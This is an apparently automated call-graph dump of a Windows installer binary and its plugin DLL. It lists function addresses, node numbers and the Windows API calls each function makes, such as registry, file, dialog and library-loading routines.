MessageBoxIndirectA 4929->4951 4953 401855 4929->4953 4954 405b86 GetFileAttributesA CreateFileA 4929->4954 4930->4929 4932->4929 4934 405114 24 API calls 4933->4934 4937 401888 4934->4937 4935 405114 24 API calls 4943 40186a 4935->4943 4936->4929 4938 402ffb 31 API calls 4937->4938 4939 40189b 4938->4939 4940 4018af SetFileTime 4939->4940 4942 4018c1 CloseHandle 4939->4942 4940->4942 4941->4929 4942->4943 4944 4018d2 4942->4944 4945 4018d7 4944->4945 4946 4018ea 4944->4946 4948 40600f 17 API calls 4945->4948 4947 40600f 17 API calls 4946->4947 4950 4018f2 4947->4950 4949 4018df lstrcatA 4948->4949 4949->4950 4950->4943 4952 405709 MessageBoxIndirectA 4950->4952 4951->4929 4952->4943 4953->4935 4953->4943 4954->4929 4955->4923 4956->4924 5073 401659 5074 402b2c 17 API calls 5073->5074 5075 40165f 5074->5075 5076 4062f0 2 API calls 5075->5076 5077 401665 5076->5077 5078 401959 5079 402b0a 17 API calls 5078->5079 5080 401960 5079->5080 5081 402b0a 17 API calls 5080->5081 5082 40196d 5081->5082 5083 402b2c 17 API calls 5082->5083 5084 401984 lstrlenA 5083->5084 5086 401994 5084->5086 5085 4019d4 5086->5085 5090 405fed lstrcpynA 5086->5090 5088 4019c4 5088->5085 5089 4019c9 lstrlenA 5088->5089 5089->5085 5090->5088 4957 4024da 4958 402b6c 17 API calls 4957->4958 4959 4024e4 4958->4959 4960 402b2c 17 API calls 4959->4960 4961 4024ed 4960->4961 4962 4024f7 RegQueryValueExA 4961->4962 4966 402783 4961->4966 4963 40251d RegCloseKey 4962->4963 4964 402517 4962->4964 4963->4966 4964->4963 4968 405f4b wsprintfA 4964->4968 4968->4963 5091 401cda 5092 402b0a 17 API calls 5091->5092 5093 401ce0 IsWindow 5092->5093 5094 401a0e 5093->5094 5095 402cdd 5096 402d05 5095->5096 5097 402cec SetTimer 5095->5097 5098 402d5a 5096->5098 5099 402d1f MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5096->5099 5097->5096 5099->5098 5100 401a5e 5101 402b0a 17 API calls 5100->5101 5102 401a67 5101->5102 5103 402b0a 17 API calls 5102->5103 5104 401a0e 5103->5104 5105 40485e 5106 40488a 5105->5106 5107 40486e 5105->5107 5109 404890 SHGetPathFromIDListA 5106->5109 5110 4048bd 5106->5110 5116 4056ed GetDlgItemTextA 5107->5116 5112 4048a0 5109->5112 5113 4048a7 SendMessageA 5109->5113 5111 40487b SendMessageA 5111->5106 5114 40140b 2 API calls 5112->5114 5113->5110 5114->5113 5116->5111 3941 70022921 3942 70022971 3941->3942 3943 70022931 VirtualProtect 3941->3943 3943->3942 3944 402363 3945 40236b 3944->3945 3948 402371 3944->3948 3946 402b2c 17 API calls 3945->3946 3946->3948 3947 402381 3950 40238f 3947->3950 3951 402b2c 17 API calls 3947->3951 3948->3947 3949 402b2c 17 API calls 3948->3949 3949->3947 3954 402b2c 3950->3954 3951->3950 3955 402b38 3954->3955 3960 40600f 3955->3960 3958 402398 WritePrivateProfileStringA 3965 40601c 3960->3965 3961 40623e 3962 402b59 3961->3962 3993 405fed lstrcpynA 3961->3993 3962->3958 3977 406257 3962->3977 3964 406218 lstrlenA 3964->3965 3965->3961 3965->3964 3966 40600f 10 API calls 3965->3966 3969 406134 GetSystemDirectoryA 3965->3969 3971 406147 GetWindowsDirectoryA 3965->3971 3972 406257 5 API calls 3965->3972 3973 40600f 10 API calls 3965->3973 3974 4061c1 lstrcatA 3965->3974 3975 40617b SHGetSpecialFolderLocation 3965->3975 3986 405ed4 3965->3986 3991 405f4b wsprintfA 3965->3991 3992 405fed lstrcpynA 3965->3992 3966->3964 3969->3965 3971->3965 3972->3965 3973->3965 3974->3965 3975->3965 3976 406193 SHGetPathFromIDListA CoTaskMemFree 3975->3976 3976->3965 3978 406263 3977->3978 3980 4062c0 CharNextA 3978->3980 3982 4062cb 3978->3982 3984 4062ae CharNextA 3978->3984 3985 4062bb CharNextA 3978->3985 3998 4059b0 3978->3998 3979 4062cf CharPrevA 3979->3982 3980->3978 3980->3982 3982->3979 3983 4062ea 3982->3983 3983->3958 3984->3978 3985->3980 3994 405e73 3986->3994 3989 405f37 3989->3965 3990 405f08 RegQueryValueExA RegCloseKey 3990->3989 3991->3965 3992->3965 3993->3962 3995 405e82 3994->3995 3996 405e86 3995->3996 3997 405e8b RegOpenKeyExA 3995->3997 3996->3989 3996->3990 3997->3996 3999 4059b6 3998->3999 4000 4059c9 3999->4000 4001 4059bc CharNextA 3999->4001 4000->3978 4001->3999 5117 401563 5118 401596 ShowWindow 5117->5118 5119 401567 5117->5119 5118->5119 5120 402965 5118->5120 5122 405f4b wsprintfA 5119->5122 5122->5120 5123 401b63 5124 401b70 5123->5124 5125 401bb4 5123->5125 5126 40233b 5124->5126 5132 401b87 5124->5132 5127 401bb8 5125->5127 5128 401bdd GlobalAlloc 5125->5128 5130 40600f 17 API calls 5126->5130 5136 401bf8 5127->5136 5144 405fed lstrcpynA 5127->5144 5129 40600f 17 API calls 5128->5129 5129->5136 5131 402348 5130->5131 5131->5136 5137 405709 MessageBoxIndirectA 5131->5137 5142 405fed lstrcpynA 5132->5142 5135 401bca GlobalFree 5135->5136 5137->5136 5138 401b96 5143 405fed lstrcpynA 5138->5143 5140 401ba5 5145 405fed lstrcpynA 5140->5145 5142->5138 5143->5140 5144->5135 5145->5136 5146 402765 5147 402b2c 17 API calls 5146->5147 5148 40276c FindFirstFileA 5147->5148 5149 40278f 5148->5149 5153 40277f 5148->5153 5154 405f4b wsprintfA 5149->5154 5151 402796 5155 405fed lstrcpynA 5151->5155 5154->5151 5155->5153 5156 4041e6 5157 4041fc 5156->5157 5164 404308 5156->5164 5160 40407b 18 API calls 5157->5160 5158 404377 5159 404441 5158->5159 5161 404381 GetDlgItem 5158->5161 5166 4040e2 8 API calls 5159->5166 5165 404252 5160->5165 5162 404397 5161->5162 5163 4043ff 5161->5163 5162->5163 5169 4043bd SendMessageA LoadCursorA SetCursor 5162->5169 5163->5159 5170 404411 5163->5170 5164->5158 5164->5159 5167 40434c GetDlgItem SendMessageA 5164->5167 5168 40407b 18 API calls 5165->5168 5180 40443c 5166->5180 5189 40409d KiUserCallbackDispatcher 5167->5189 5172 40425f CheckDlgButton 5168->5172 5193 40448a 5169->5193 5175 404417 SendMessageA 5170->5175 5176 404428 5170->5176 5187 40409d KiUserCallbackDispatcher 5172->5187 5175->5176 5176->5180 5181 40442e SendMessageA 5176->5181 5177 404372 5190 404466 5177->5190 5178 40427d GetDlgItem 5188 4040b0 SendMessageA 5178->5188 5181->5180 5184 404293 SendMessageA 5185 4042b1 GetSysColor 5184->5185 5186 4042ba SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5184->5186 5185->5186 5186->5180 5187->5178 5188->5184 5189->5177 5191 404474 5190->5191 5192 404479 SendMessageA 5190->5192 5191->5192 5192->5158 5196 4056cf ShellExecuteExA 5193->5196 5195 4043f0 LoadCursorA SetCursor 5195->5163 5196->5195 4563 4023e8 4564 40241a 4563->4564 4565 4023ef 4563->4565 4567 402b2c 17 API calls 4564->4567 4575 402b6c 4565->4575 4569 402421 4567->4569 4580 402bea 4569->4580 4570 402400 4572 402b2c 17 API calls 4570->4572 4573 402407 RegDeleteValueA RegCloseKey 4572->4573 4574 40242e 4573->4574 4576 402b2c 17 API calls 4575->4576 4577 402b83 4576->4577 4578 405e73 RegOpenKeyExA 4577->4578 4579 4023f6 4578->4579 4579->4570 4579->4574 4581 402bfd 4580->4581 4582 402bf6 4580->4582 4581->4582 4584 402c2e 4581->4584 4582->4574 4585 405e73 RegOpenKeyExA 4584->4585 4590 402c5c 4585->4590 4586 402c82 RegEnumKeyA 4587 402c99 RegCloseKey 4586->4587 4586->4590 4588 406385 5 API calls 4587->4588 4591 402ca9 4588->4591 4589 402cba RegCloseKey 4594 402cad 4589->4594 4590->4586 4590->4587 4590->4589 4592 402c2e 6 API calls 4590->4592 4590->4594 4593 402cca RegDeleteKeyA 4591->4593 4591->4594 4592->4590 4593->4594 4594->4582 4595 4025ea 4596 402603 4595->4596 4597 4025ef 4595->4597 4599 402b2c 17 API calls 4596->4599 4604 402b0a 4597->4604 4600 40260a lstrlenA 4599->4600 4601 4025f8 4600->4601 4602 405c2d WriteFile 4601->4602 4603 40262c 4601->4603 4602->4603 4605 40600f 17 API calls 4604->4605 4606 402b1f 4605->4606 4606->4601 4607 40206a 4608 40207c 4607->4608 4618 40212a 4607->4618 4609 402b2c 17 API calls 4608->4609 4611 402083 4609->4611 4610 401423 24 API calls 4613 4022a9 4610->4613 4612 402b2c 17 API calls 4611->4612 4614 40208c 4612->4614 4615 4020a1 LoadLibraryExA 4614->4615 4616 402094 GetModuleHandleA 4614->4616 4617 4020b1 GetProcAddress 4615->4617 4615->4618 4616->4615 4616->4617 4619 4020c0 4617->4619 4620 4020fd 4617->4620 4618->4610 4621 4020c8 4619->4621 4622 4020df 4619->4622 4623 405114 24 API calls 4620->4623 4670 401423 4621->4670 4628 700216db 4622->4628 4625 4020d0 4623->4625 4625->4613 4626 40211e FreeLibrary 4625->4626 4626->4613 4629 7002170b 4628->4629 4673 70021a98 4629->4673 4631 70021712 4632 70021834 4631->4632 4633 70021723 4631->4633 4634 7002172a 4631->4634 4632->4625 4721 700222af 4633->4721 4705 700222f1 4634->4705 4639 7002174f 4640 70021770 4639->4640 4641 7002178e 4639->4641 4734 700224d8 4640->4734 4646 70021794 4641->4646 4647 700217dc 4641->4647 4642 70021740 4645 70021746 4642->4645 4649 70021751 4642->4649 4643 70021759 4643->4639 4731 70022cc3 4643->4731 4645->4639 4715 70022a38 4645->4715 4753 7002156b 4646->4753 4653 700224d8 11 API calls 4647->4653 4648 70021776 4745 70021559 4648->4745 4725 700226b2 4649->4725 4657 700217cd 4653->4657 4661 70021823 4657->4661 4759 7002249e 4657->4759 4659 70021757 4659->4639 4660 700224d8 11 API calls 4660->4657 4661->4632 4665 7002182d GlobalFree 4661->4665 4665->4632 4667 7002180f 4667->4661 4763 700214e2 wsprintfA 4667->4763 4668 70021808 FreeLibrary 4668->4667 4671 405114 24 API calls 4670->4671 4672 401431 4671->4672 4672->4625 4766 70021215 GlobalAlloc 4673->4766 4675 70021abf 4767 70021215 GlobalAlloc 4675->4767 4677 70021d00 GlobalFree GlobalFree GlobalFree 4678 70021d1d 4677->4678 4690 70021d67 4677->4690 4680 700220f1 4678->4680 4688 70021d32 4678->4688 4678->4690 4679 70021bbd GlobalAlloc 4699 70021aca 4679->4699 4681 70022113 GetModuleHandleA 4680->4681 4680->4690 4684 70022124 LoadLibraryA 4681->4684 4685 70022139 4681->4685 4682 70021c08 lstrcpyA 4687 70021c12 lstrcpyA 4682->4687 4683 70021c26 GlobalFree 4683->4699 4684->4685 4684->4690 4774 700215c2 GetProcAddress 4685->4774 4687->4699 4688->4690 4770 70021224 4688->4770 4689 70022033 4689->4690 4702 7002208c lstrcpyA 4689->4702 4690->4631 4691 7002218a 4691->4690 4696 70022197 lstrlenA 4691->4696 4692 70021fb7 4773 70021215 GlobalAlloc 4692->4773 4694 7002214b 4694->4691 4703 70022174 GetProcAddress 4694->4703 4775 700215c2 GetProcAddress 4696->4775 4697 70021ef9 GlobalFree 4697->4699 4699->4677 4699->4679 4699->4682 4699->4683 4699->4687 4699->4689 4699->4690 4699->4692 4699->4697 4700 70021224 2 API calls 4699->4700 4768 70021534 GlobalSize GlobalAlloc 4699->4768 4700->4699 4702->4690 4703->4691 4704 70021fbf 4704->4631 4706 7002230a 4705->4706 4708 70022446 GlobalFree 4706->4708 4709 700223b8 GlobalAlloc MultiByteToWideChar 4706->4709 4712 70021224 GlobalAlloc lstrcpynA 4706->4712 4714 70022405 4706->4714 4777 700212ad 4706->4777 4708->4706 4710 70021730 4708->4710 4711 700223e4 GlobalAlloc CLSIDFromString GlobalFree 4709->4711 4709->4714 4710->4639 4710->4642 4710->4643 4711->4708 4712->4706 4714->4708 4781 70022646 4714->4781 4716 70022a4a 4715->4716 4717 70022aef VirtualAlloc 4716->4717 4720 70022b0d 4717->4720 4719 70022bd9 4719->4639 4784 700229e4 4720->4784 4722 700222c4 4721->4722 4723 700222cf GlobalAlloc 4722->4723 4724 70021729 4722->4724 4723->4722 4724->4634 4729 700226e2 4725->4729 4726 70022790 4728 70022796 GlobalSize 4726->4728 4730 700227a0 4726->4730 4727 7002277d GlobalAlloc 4727->4730 4728->4730 4729->4726 4729->4727 4730->4659 4732 70022cce 4731->4732 4733 70022d0e GlobalFree 4732->4733 4788 70021215 GlobalAlloc 4734->4788 4736 70022563 lstrcpynA 4742 700224e4 4736->4742 4737 70022574 StringFromGUID2 WideCharToMultiByte 4737->4742 4738 70022598 WideCharToMultiByte 4738->4742 4739 700225b9 wsprintfA 4739->4742 4740 700225dd GlobalFree 4740->4742 4741 70022617 GlobalFree 4741->4648 4742->4736 4742->4737 4742->4738 4742->4739 4742->4740 4742->4741 4743 70021266 2 API calls 4742->4743 4789 700212d1 4742->4789 4743->4742 4793 70021215 GlobalAlloc 4745->4793 4747 7002155e 4748 7002156b 2 API calls 4747->4748 4749 70021568 4748->4749 4750 70021266 4749->4750 4751 700212a8 GlobalFree 4750->4751 4752 7002126f GlobalAlloc lstrcpynA 4750->4752 4751->4657 4752->4751 4754 700215a4 lstrcpyA 4753->4754 4755 70021577 wsprintfA 4753->4755 4758 700215bd 4754->4758 4755->4758 4758->4660 4760 700217ef 4759->4760 4761 700224ac 4759->4761 4760->4667 4760->4668 4761->4760 4762 700224c5 GlobalFree 4761->4762 4762->4761 4764 70021266 2 API calls 4763->4764 4765 70021503 4764->4765 4765->4661 4766->4675 4767->4699 4769 70021552 4768->4769 4769->4699 4776 70021215 GlobalAlloc 4770->4776 4772 70021233 lstrcpynA 4772->4690 4773->4704 4774->4694 4775->4690 4776->4772 4778 700212b4 4777->4778 4779 70021224 2 API calls 4778->4779 4780 700212cf 4779->4780 4780->4706 4782 70022654 VirtualAlloc 4781->4782 4783 700226aa 4781->4783 4782->4783 4783->4714 4785 700229ef 4784->4785 4786 700229f4 GetLastError 4785->4786 4787 700229ff 4785->4787 4786->4787 4787->4719 4788->4742 4790 700212da 4789->4790 4791 700212f9 4789->4791 4790->4791 4792 700212e0 lstrcpyA 4790->4792 4791->4742 4792->4791 4793->4747 4794 40166a 4795 402b2c 17 API calls 4794->4795 4796 401671 4795->4796 4797 402b2c 17 API calls 4796->4797 4798 40167a 4797->4798 4799 402b2c 17 API calls 4798->4799 4800 401683 MoveFileA 4799->4800 4801 401696 4800->4801 4802 40168f 4800->4802 4804 4062f0 2 API calls 4801->4804 4806 4022a9 4801->4806 4803 401423 24 API calls 4802->4803 4803->4806 4805 4016a5 4804->4805 4805->4806 4807 405dcc 36 API calls 4805->4807 4807->4802 5197 4019ed 5198 402b2c 17 API calls 5197->5198 5199 4019f4 5198->5199 5200 402b2c 17 API calls 5199->5200 5201 4019fd 5200->5201 5202 401a04 lstrcmpiA 5201->5202 5203 401a16 lstrcmpA 5201->5203 5204 401a0a 5202->5204 5203->5204 4820 4026ef 4821 4026f6 4820->4821 4824 402965 4820->4824 4822 402b0a 17 API calls 4821->4822 4823 4026fd 4822->4823 4825 40270c SetFilePointer 4823->4825 4825->4824 4826 40271c 4825->4826 4828 405f4b wsprintfA 4826->4828 4828->4824 4829 40156f 4830 40157f ShowWindow 4829->4830 4831 401586 4829->4831 4830->4831 4832 402965 4831->4832 4833 401596 ShowWindow 4831->4833 4833->4832 4834 402960 4833->4834 4836 405f4b wsprintfA 4834->4836 4836->4832 5205 4014f4 SetForegroundWindow 5206 4029b8 5205->5206 5207 70021837 5208 7002185a 5207->5208 5209 7002188a GlobalFree 5208->5209 5210 7002189c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5208->5210 5209->5210 5211 70021266 2 API calls 5210->5211 5212 70021a1e GlobalFree GlobalFree 5211->5212 5213 70021638 5214 70021667 5213->5214 5215 70021a98 18 API calls 5214->5215 5216 7002166e 5215->5216 5217 70021681 5216->5217 5218 70021675 5216->5218 5220 7002168b 5217->5220 5221 700216a8 5217->5221 5219 70021266 2 API calls 5218->5219 5229 7002167f 5219->5229 5222 700214e2 3 API calls 5220->5222 5223 700216d2 5221->5223 5224 700216ae 5221->5224 5227 70021690 5222->5227 5226 700214e2 3 API calls 5223->5226 5225 70021559 3 API calls 5224->5225 5228 700216b3 5225->5228 5226->5229 5230 70021559 3 API calls 5227->5230 5231 70021266 2 API calls 5228->5231 5232 70021696 5230->5232 5233 700216b9 GlobalFree 5231->5233 5234 70021266 2 API calls 5232->5234 5233->5229 5235 700216cd GlobalFree 5233->5235 5236 7002169c GlobalFree 5234->5236 5235->5229 5236->5229 5237 401cfb 5238 402b0a 17 API calls 5237->5238 5239 401d02 5238->5239 5240 402b0a 17 API calls 5239->5240 5241 401d0e GetDlgItem 5240->5241 5242 4025e4 5241->5242 5243 4018fd 5244 401934 5243->5244 5245 402b2c 17 API calls 5244->5245 5246 401939 5245->5246 5247 4057b5 67 API calls 5246->5247 5248 401942 5247->5248 5249 7002103d 5250 7002101b 5 API calls 5249->5250 5251 70021056 5250->5251 5252 401dff GetDC 5253 402b0a 17 API calls 5252->5253 5254 401e11 GetDeviceCaps MulDiv ReleaseDC 5253->5254 5255 402b0a 17 API calls 5254->5255 5256 401e42 5255->5256 5257 40600f 17 API calls 5256->5257 5258 401e7f CreateFontIndirectA 5257->5258 5259 4025e4 5258->5259 5260 401000 5261 401037 BeginPaint GetClientRect 5260->5261 5262 40100c DefWindowProcA 5260->5262 5264 4010f3 5261->5264 5265 401179 5262->5265 5266 401073 CreateBrushIndirect FillRect DeleteObject 5264->5266 5267 4010fc 5264->5267 5266->5264 5268 401102 CreateFontIndirectA 5267->5268 5269 401167 EndPaint 5267->5269 5268->5269 5270 401112 6 API calls 5268->5270 5269->5265 5270->5269 5271 404a80 GetDlgItem GetDlgItem 5272 404ad6 7 API calls 5271->5272 5277 404cfd 5271->5277 5273 404b72 SendMessageA 5272->5273 5274 404b7e DeleteObject 5272->5274 5273->5274 5275 404b89 5274->5275 5276 404bc0 5275->5276 5278 40600f 17 API calls 5275->5278 5279 40407b 18 API calls 5276->5279 5284 404ddf 5277->5284 5305 404d6c 5277->5305 5324 4049ce SendMessageA 5277->5324 5282 404ba2 SendMessageA SendMessageA 5278->5282 5283 404bd4 5279->5283 5280 404e8b 5281 404e95 SendMessageA 5280->5281 5288 404e9d 5280->5288 5281->5288 5282->5275 5290 40407b 18 API calls 5283->5290 5284->5280 5285 404e38 SendMessageA 5284->5285 5314 404cf0 5284->5314 5292 404e4d SendMessageA 5285->5292 5285->5314 5286 4040e2 8 API calls 5293 405081 5286->5293 5287 404dd1 SendMessageA 5287->5284 5294 404eb6 5288->5294 5295 404eaf ImageList_Destroy 5288->5295 5299 404ec6 5288->5299 5302 404be5 5290->5302 5291 405035 5300 405047 ShowWindow GetDlgItem ShowWindow 5291->5300 5291->5314 5297 404e60 5292->5297 5298 404ebf GlobalFree 5294->5298 5294->5299 5295->5294 5296 404cbf GetWindowLongA SetWindowLongA 5301 404cd8 5296->5301 5307 404e71 SendMessageA 5297->5307 5298->5299 5299->5291 5317 404f01 5299->5317 5329 404a4e 5299->5329 5300->5314 5303 404cf5 5301->5303 5304 404cdd ShowWindow 5301->5304 5302->5296 5306 404c37 SendMessageA 5302->5306 5308 404cba 5302->5308 5311 404c75 SendMessageA 5302->5311 5312 404c89 SendMessageA 5302->5312 5323 4040b0 SendMessageA 5303->5323 5322 4040b0 SendMessageA 5304->5322 5305->5284 5305->5287 5306->5302 5307->5280 5308->5296 5308->5301 5311->5302 5312->5302 5314->5286 5315 40500b InvalidateRect 5315->5291 5316 405021 5315->5316 5338 404989 5316->5338 5318 404f2f SendMessageA 5317->5318 5321 404f45 5317->5321 5318->5321 5320 404fb9 SendMessageA SendMessageA 5320->5321 5321->5315 5321->5320 5322->5314 5323->5277 5325 4049f1 GetMessagePos ScreenToClient SendMessageA 5324->5325 5326 404a2d SendMessageA 5324->5326 5327 404a25 5325->5327 5328 404a2a 5325->5328 5326->5327 5327->5305 5328->5326 5341 405fed lstrcpynA 5329->5341 5331 404a61 5342 405f4b wsprintfA 5331->5342 5333 404a6b 5334 40140b 2 API calls 5333->5334 5335 404a74 5334->5335 5343 405fed lstrcpynA 5335->5343 5337 404a7b 5337->5317 5344 4048c4 5338->5344 5340 40499e 5340->5291 5341->5331 5342->5333 5343->5337 5345 4048da 5344->5345 5346 40600f 17 API calls 5345->5346 5347 40493e 5346->5347 5348 40600f 17 API calls 5347->5348 5349 404949 5348->5349 5350 40600f 17 API calls 5349->5350 5351 40495f lstrlenA wsprintfA SetDlgItemTextA 5350->5351 5351->5340 5352 401900 5353 402b2c 17 API calls 5352->5353 5354 401907 5353->5354 5355 405709 MessageBoxIndirectA 5354->5355 5356 401910 5355->5356 5357 401502 5358 40150a 5357->5358 5360 40151d 5357->5360 5359 402b0a 17 API calls 5358->5359 5359->5360 5361 405088 5362 405098 5361->5362 5363 4050ac 5361->5363 5364 4050f5 5362->5364 5365 40509e 5362->5365 5366 4050b4 IsWindowVisible 5363->5366 5372 4050cb 5363->5372 5367 4050fa CallWindowProcA 5364->5367 5368 4040c7 SendMessageA 5365->5368 5366->5364 5369 4050c1 5366->5369 5371 4050a8 5367->5371 5368->5371 5370 4049ce 5 API calls 5369->5370 5370->5372 5372->5367 5373 404a4e 4 API calls 5372->5373 5373->5364 5374 401c0a 5375 402b0a 17 API calls 5374->5375 5376 401c11 5375->5376 5377 402b0a 17 API calls 5376->5377 5379 401c1e 5377->5379 5378 401c33 5381 401c43 5378->5381 5382 402b2c 17 API calls 5378->5382 5379->5378 5380 402b2c 17 API calls 5379->5380 5380->5378 5383 401c9a 5381->5383 5384 401c4e 5381->5384 5382->5381 5385 402b2c 17 API calls 5383->5385 5386 402b0a 17 API calls 5384->5386 5387 401c9f 5385->5387 5388 401c53 5386->5388 5389 402b2c 17 API calls 5387->5389 5390 402b0a 17 API calls 5388->5390 5391 401ca8 FindWindowExA 5389->5391 5392 401c5f 5390->5392 5395 401cc6 5391->5395 5393 401c8a SendMessageA 5392->5393 5394 401c6c SendMessageTimeoutA 5392->5394 5393->5395 5394->5395 5396 40450d 5397 404539 5396->5397 5398 40454a 5396->5398 5457 4056ed GetDlgItemTextA 5397->5457 5399 404556 GetDlgItem 5398->5399 5407 4045b5 5398->5407 5401 40456a 5399->5401 5405 40457e SetWindowTextA 5401->5405 5410 405a1e 4 API calls 5401->5410 5402 404699 5406 404843 5402->5406 5459 4056ed GetDlgItemTextA 5402->5459 5403 404544 5404 406257 5 API calls 5403->5404 5404->5398 5411 40407b 18 API calls 5405->5411 5409 4040e2 8 API calls 5406->5409 5407->5402 5407->5406 5412 40600f 17 API calls 5407->5412 5414 404857 5409->5414 5415 404574 5410->5415 5416 40459a 5411->5416 5417 404629 SHBrowseForFolderA 5412->5417 5413 4046c9 5418 405a73 18 API calls 5413->5418 5415->5405 5422 405985 3 API calls 5415->5422 5419 40407b 18 API calls 5416->5419 5417->5402 5420 404641 CoTaskMemFree 5417->5420 5421 4046cf 5418->5421 5423 4045a8 5419->5423 5424 405985 3 API calls 5420->5424 5460 405fed lstrcpynA 5421->5460 5422->5405 5458 4040b0 SendMessageA 5423->5458 5426 40464e 5424->5426 5430 404685 SetDlgItemTextA 5426->5430 5433 40600f 17 API calls 5426->5433 5428 4046e6 5432 406385 5 API calls 5428->5432 5429 4045ae 5431 406385 5 API calls 5429->5431 5430->5402 5431->5407 5439 4046ed 5432->5439 5434 40466d lstrcmpiA 5433->5434 5434->5430 5436 40467e lstrcatA 5434->5436 5435 404729 5461 405fed lstrcpynA 5435->5461 5436->5430 5438 404730 5440 405a1e 4 API calls 5438->5440 5439->5435 5444 4059cc 2 API calls 5439->5444 5445 404781 5439->5445 5441 404736 GetDiskFreeSpaceA 5440->5441 5443 40475a MulDiv 5441->5443 5441->5445 5443->5445 5444->5439 5446 4047f2 5445->5446 5448 404989 20 API calls 5445->5448 5447 404815 5446->5447 5450 40140b 2 API calls 5446->5450 5462 40409d KiUserCallbackDispatcher 5447->5462 5449 4047df 5448->5449 5451 4047f4 SetDlgItemTextA 5449->5451 5452 4047e4 5449->5452 5450->5447 5451->5446 5454 4048c4 20 API calls 5452->5454 5454->5446 5455 404831 5455->5406 5456 404466 SendMessageA 5455->5456 5456->5406 5457->5403 5458->5429 5459->5413 5460->5428 5461->5438 5462->5455 4837 401e8f 4838 402b0a 17 API calls 4837->4838 4839 401e95 4838->4839 4840 402b0a 17 API calls 4839->4840 4841 401ea1 4840->4841 4842 401eb8 EnableWindow 4841->4842 4843 401ead ShowWindow 4841->4843 4844 4029b8 4842->4844 4843->4844 5463 401490 5464 405114 24 API calls 5463->5464 5465 401497 5464->5465 5466 402993 SendMessageA 5467 4029b8 5466->5467 5468 4029ad InvalidateRect 5466->5468 5468->5467 5469 700215d1 5470 700214bb GlobalFree 5469->5470 5472 700215e9 5470->5472 5471 7002162f GlobalFree 5472->5471 5473 70021604 5472->5473 5474 7002161b VirtualFree 5472->5474 5473->5471 5474->5471 5475 7002225a 5476 700222c4 5475->5476 5477 700222cf GlobalAlloc 5476->5477 5478 700222ee 5476->5478 5477->5476 5479 401f98 5480 402b2c 17 API calls 5479->5480 5481 401f9f 5480->5481 5482 4062f0 2 API calls 5481->5482 5483 401fa5 5482->5483 5485 401fb7 5483->5485 5486 405f4b wsprintfA 5483->5486 5486->5485 5487 70021058 5489 70021074 5487->5489 5488 700210dc 5489->5488 5490 700214bb GlobalFree 5489->5490 5491 70021091 5489->5491 5490->5491 5492 700214bb GlobalFree 5491->5492 5493 700210a1 5492->5493 5494 700210b1 5493->5494 5495 700210a8 GlobalSize 5493->5495 5496 700210c6 5494->5496 5497 700210b5 GlobalAlloc 5494->5497 5495->5494 5499 700210d1 GlobalFree 5496->5499 5498 700214e2 3 API calls 5497->5498 5498->5496 5499->5488 5500 40149d 5501 4014ab PostQuitMessage 5500->5501 5502 40234e 5500->5502 5501->5502 5503 40159d 5504 402b2c 17 API calls 5503->5504 5505 4015a4 SetFileAttributesA 5504->5505 5506 4015b6 5505->5506 5507 401a1e 5508 402b2c 17 API calls 5507->5508 5509 401a27 ExpandEnvironmentStringsA 5508->5509 5510 401a3b 5509->5510 5512 401a4e 5509->5512 5511 401a40 lstrcmpA 5510->5511 5510->5512 5511->5512 5518 40289e 5519 402b0a 17 API calls 5518->5519 5520 4028a4 5519->5520 5521 4028e3 5520->5521 5522 4028cc 5520->5522 5528 402783 5520->5528 5523 4028fd 5521->5523 5524 4028ed 5521->5524 5525 4028d1 5522->5525 5529 4028e0 5522->5529 5527 40600f 17 API calls 5523->5527 5526 402b0a 17 API calls 5524->5526 5532 405fed lstrcpynA 5525->5532 5526->5529 5527->5529 5529->5528 5533 405f4b wsprintfA 5529->5533 5532->5528 5533->5528 5534 40171f 5535 402b2c 17 API calls 5534->5535 5536 401726 SearchPathA 5535->5536 5537 401741 5536->5537 5538 401d20 5539 402b0a 17 API calls 5538->5539 5540 401d2e SetWindowLongA 5539->5540 5541 4029b8 5540->5541 5542 402721 5543 402727 5542->5543 5544 4029b8 5543->5544 5545 40272f FindClose 5543->5545 5545->5544 5546 70022be3 5547 70022bfb 5546->5547 5548 70021534 2 API calls 5547->5548 5549 70022c16 5548->5549 5550 700210e0 5559 7002110e 5550->5559 5551 700211c4 GlobalFree 5552 700212ad 2 API calls 5552->5559 5553 700211c3 5553->5551 5554 70021155 GlobalAlloc 5554->5559 5555 700211ea GlobalFree 5555->5559 5556 70021266 2 API calls 5558 700211b1 GlobalFree 5556->5558 5557 700212d1 lstrcpyA 5557->5559 5558->5559 5559->5551 5559->5552 5559->5553 5559->5554 5559->5555 5559->5556 5559->5557 5559->5558 5560 4027a3 5561 402b2c 17 API calls 5560->5561 5562 4027b1 5561->5562 5563 4027c7 5562->5563 5564 402b2c 17 API calls 5562->5564 5565 405b61 2 API calls 5563->5565 5564->5563 5566 4027cd 5565->5566 5588 405b86 GetFileAttributesA CreateFileA 5566->5588 5568 4027da 5569 4027e6 GlobalAlloc 5568->5569 5570 40287d 5568->5570 5571 402874 CloseHandle 5569->5571 5572 4027ff 5569->5572 5573 402885 DeleteFileA 5570->5573 5574 402898 5570->5574 5571->5570 5589 403200 SetFilePointer 5572->5589 5573->5574 5576 402805 5577 4031ea ReadFile 5576->5577 5578 40280e GlobalAlloc 5577->5578 5579 402852 5578->5579 5580 40281e 5578->5580 5581 405c2d WriteFile 5579->5581 5582 402ffb 31 API calls 5580->5582 5583 40285e GlobalFree 5581->5583 5584 40282b 5582->5584 5585 402ffb 31 API calls 5583->5585 5586 402849 GlobalFree 5584->5586 5587 402871 5585->5587 5586->5579 5587->5571 5588->5568 5589->5576 4012 403ba7 4013 403cfa 4012->4013 4014 403bbf 4012->4014 4016 403d0b GetDlgItem GetDlgItem 4013->4016 4021 403d4b 4013->4021 4014->4013 4015 403bcb 4014->4015 4018 403bd6 SetWindowPos 4015->4018 4019 403be9 4015->4019 4020 40407b 18 API calls 4016->4020 4017 403da5 4030 403cf5 4017->4030 4083 4040c7 4017->4083 4018->4019 4023 403c06 4019->4023 4024 403bee ShowWindow 4019->4024 4025 403d35 SetClassLongA 4020->4025 4021->4017 4026 401389 2 API calls 4021->4026 4027 403c28 4023->4027 4028 403c0e DestroyWindow 4023->4028 4024->4023 4029 40140b 2 API calls 4025->4029 4034 403d7d 4026->4034 4032 403c2d SetWindowLongA 4027->4032 4033 403c3e 4027->4033 4031 404004 4028->4031 4029->4021 4031->4030 4043 404035 ShowWindow 4031->4043 4032->4030 4035 403ce7 4033->4035 4036 403c4a GetDlgItem 